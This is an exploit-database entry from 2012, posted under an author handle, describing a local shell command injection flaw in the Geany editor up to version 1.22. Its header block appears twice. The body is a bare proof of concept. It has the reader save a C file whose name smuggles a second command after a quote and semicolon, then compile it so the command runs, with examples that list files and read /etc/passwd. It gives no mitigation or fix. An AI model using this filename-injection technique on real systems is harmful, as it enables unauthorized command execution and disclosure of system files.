Geany <=1.22 Local Code injection Vulnerability
| EKU-ID: 2864 | CVE: | OSVDB-ID: |
| Author: D4RKCR1PT3R | Published: 2012-12-10 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 2864 | CVE: | OSVDB-ID: |
| Author: D4RKCR1PT3R | Published: 2012-12-10 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Geany <=1.22 Local Shell Command injection Vulnerability Since that A.B.C.D = Command that will be injected. POC: Create a C file, any file, click save, the filename you put: xpl.c";A.B.C.D" Now compile the file using Geany (Build-> Compile) (Or the shortcut F8), injected code ready. Examples: xpl.c";ls -la" xpl.c";cat /etc/passwd"